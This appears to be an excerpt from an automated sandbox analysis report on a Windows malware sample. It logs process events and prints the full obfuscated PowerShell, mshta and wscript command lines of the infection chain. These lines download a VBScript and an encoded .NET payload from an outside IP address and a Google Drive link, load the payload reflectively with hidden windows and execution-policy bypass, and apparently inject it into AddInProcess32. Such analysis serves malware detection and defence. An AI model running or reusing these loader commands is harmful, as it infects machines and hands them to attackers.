Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE88F2314B rdtsc 5_2_000007FE88F2314B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: powershell.exe PID: 204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgjxbelewuqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfkzc1uevbficagicagicagicagicagicagicagicagicagicagicattwvnqmvyrevmaw5pdelpbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbydhjishmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbubgnylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagr3l2cix1aw50icagicagicagicagicagicagicagicagicagicagicb1leludfb0ciagicagicagicagicagicagicagicagicagicagicagqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicjicsigicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bhq0ugicagicagicagicagicagicagicagicagicagicagifpyysagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgjxbelewuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumjewljixns44lzu0mc9jcmvhdgvkymvzdhroaw5nc3dpdghuawnld29ya2dyzwf0ac50suyilcikrw5wokfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmildasmck7u1rhulqtc0xlzvaomyk7c3rbclqgicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmi'+[char]0x22+'))')))"
